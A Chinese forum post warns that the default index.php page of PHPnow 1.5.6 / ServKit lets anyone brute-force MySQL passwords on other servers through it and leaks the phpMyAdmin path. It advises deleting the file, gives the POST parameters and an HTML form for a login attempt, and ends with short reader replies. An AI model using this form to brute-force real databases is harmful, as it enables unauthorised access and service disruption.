赶紧删除 !PHPnow-1.5.6|ServKit安装后默认页index.php存在两个高危BUG送漏洞利用方法

璁哄潧

打开文件 \PHPnow-1.5.6\Pn\index.ph_ (非网站根路径) 将其修改为其他页面，添加虚拟主机后默认页面即为该页面。
该文件请勿长期存放于外网可访问的网站中(本地测试、局域网除外)，目前该版本已8年没有更新，安装测试完成后请及时删除或覆盖，如下页面:

漏洞类型:
漏洞1:MySQL密码爆破漏洞，攻击者可通过该页面发起间接MySQL密码爆破攻击，造成本服务器并发连接数达到上限而瘫痪。
比如域名 a.com 开放了该页面 b.com 开放了端口3306(也可以是其他端口) 攻击者可通过 a.com 的漏洞页面作为代理爆破 b.com 的MySQL帐号密码。

漏洞2:PhpMyAdmin 路径泄漏漏洞，重命名根目录的 phpMyAdmin 文件夹名称即可解决。

利用方法:
该页面中没有任何Cookies/Session校验，来路检查以及验证码功能

提交以下POST参数即表单即可尝试登录一次MySQL:

1. 
   
2. mysqlHost        数据库地址
   
3. mysqlDb                数据库名
   
4. mysqlUser        数据库用户名
   
5. mysqlPassword        数据库密码
   
6. act                固定为1
   

复制代码

使用以下HTML代码提交数据库连接表单:

1. 
   
2. <form action="index.php" method="post">
   
3. <input type="hidden" name="act" value="1"/>
   
4. 数据库地址:<input type="text" name="mysqlHost" value="localhost"/><br/>
   
5. 数据库名:<input type="text" name="mysqlDb" value="test"/><br/>
   
6. 数据库用户名：<input type="text" name="mysqlUser" value="root"/><br/>
   
7. 数据库密码：<input type="text" name="mysqlPassword" /><br/>
   
8. <input type="submit" value="连接" /><br/>
   
9. </form>
   

复制代码

520

还好我没用过这软件

Cute

这个漏洞严重会造成服务器被封，

Cute

这个漏洞严重会造成服务器被封，

U_U

啥漏洞了这么严重

1心1亿

谢谢分享

这个名字想了很9

233333333333

Orange

好的谢谢

笔芯

没用过这个

花心大萝卜

我来看看

小莉今年7岁

我已经删了